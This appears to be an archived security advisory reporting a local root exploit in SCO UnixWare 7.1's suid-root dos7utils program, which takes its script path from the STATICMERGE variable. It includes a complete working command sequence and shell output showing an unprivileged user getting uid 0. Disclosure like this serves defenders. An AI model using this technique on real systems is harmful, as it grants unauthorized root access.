SCO_root_exploit.txt

`Greetings,  
  
A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by  
default) which allows any user to execute any command as root. The dos7utils  
program gets its localeset.sh exec path from the environment variable  
STATICMERGE. By setting this to a directory writable by us and setting the -f  
switch, we can have dos7utils run our program as follows:  
  
  
bash-2.02$ uname -a; id; pwd  
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5  
uid=101(xnec) gid=1(other)  
/usr/lib/merge  
bash-2.02$ export STATICMERGE=/tmp  
bash-2.02$ cat > /tmp/localeset.sh  
#!/bin/sh  
id  
bash-2.02$ chmod 700 /tmp/localeset.sh   
bash-2.02$ ./dos7utils -f bah  
uid=0(root) gid=1(other)  
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)  
bash-2.02$   
----  
  
Searching through the securityfocus vulnerability archives yields 0 matches  
for search string "unixware", but several for "openserver". I thought this  
was rather strange, considering that SCO is discontinuing OpenServer after  
5.0.5 in favor of the much more reliable (though not security-wise, evidently)  
UnixWare 7. And so begins my audit of the virgin Unixware 7 so soon after my  
incomplete audit of SCO 5.0.5.  
  
Brock Tellier  
UNIX Systems Administrator  
  
____________________________________________________________________  
Get free email and a permanent address at http://www.netaddress.com/?N=1  
`